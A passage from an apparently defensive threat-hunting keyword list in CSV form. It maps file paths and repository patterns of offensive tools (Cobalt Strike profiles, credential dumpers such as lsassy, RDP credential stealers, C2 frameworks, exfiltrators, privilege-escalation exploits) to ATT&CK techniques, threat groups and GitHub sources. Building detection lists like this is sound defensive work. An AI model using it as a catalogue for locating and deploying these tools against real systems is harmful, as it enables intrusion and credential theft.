TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/ramnit.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/random-robbie/cve-2022-23131-exp*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py,1,1,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*/Ransomware.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*/rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*/rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*/RasmanPotato*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - 
TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*/Rat_Generator*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/ratankba.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ratchatpt.git*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatpt.git*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - 
T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.go*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.go*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.syso*,offensive_tool_keyword,ratchatgpt,ratchatpt a tool using openai api as a C2,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,N/A,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/ratchatPT.syso*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/RationalLove.c,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/raw/kali/main/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/raw/kali/master/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/raw_shellcode_size.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/rawrpc.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/RC4BinaryEncryption.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/RC4Payload32.txt*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/RCStep/CSSG/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/RDE1.git*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*/rdll_template*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RDPassSpray.git*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*/RDPCredentialStealer.git*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*/rdp-enum-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rdp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rdp-vuln-ms12-020.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/readfile_bof.*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*/Readfile_BoF/*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*/RealTimeSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/realvnc-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Reaper.git*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/Reaper/Reaper.cpp*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/ReaperX64.zip*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/REC2.git*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*/recon-archy.git*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*/RecycledInjector*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/RecycledInjector.git*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/RedGuard.git*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/RedGuard.go*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z 
-*/RedGuard_32,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/RedGuard_64,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/redirector/redirector.py*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/redis-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation 